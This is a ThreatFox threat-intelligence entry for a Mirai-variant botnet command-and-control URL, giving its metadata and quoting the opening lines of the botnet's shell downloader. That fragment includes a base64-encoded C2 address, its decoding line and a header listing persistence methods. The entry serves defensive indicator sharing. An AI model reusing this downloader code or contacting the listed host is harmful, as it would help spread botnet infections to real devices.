🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

ThreatFox IOC Database

You are viewing the ThreatFox database entry for url http://vps.atlas101.us.kg.

Database Entry


IOC ID:1893465
IOC: http://vps.atlas101.us.kg
IOC Type :url
Threat Type :botnet_cc
Malware: Mirai
Malware alias:Katana
Confidence Level : Confidence level is high (100%)
Is compromised? : False
ASN:AS219502 STORMCLOUD-AS
Country:- US
First seen:2026-09-03 05:39:49 UTC
Last seen:never
UUID:9e62428a-a6f3-11f1-b569-42010aa4000a
Reporter BlinkzSec
Reward 5 credits from ThreatFox
Tags:FlutterBotnet

Avatar
BlinkzSec
#!/bin/sh
# Flutter Botnet — Downloader + Persistence
# Multi-arch downloader with HTTP→TFTP→FTP fallback, memfd execution.
# Adds persistence via cron, rc.local, systemd, watchdog, and more.

C2_B64="dnBzLmF0bGFzMTAxLnVzLmtnOjgw"
C2_URL="$(echo "$C2_B64" | base64 -d 2>/dev/null | tr -d '\n')"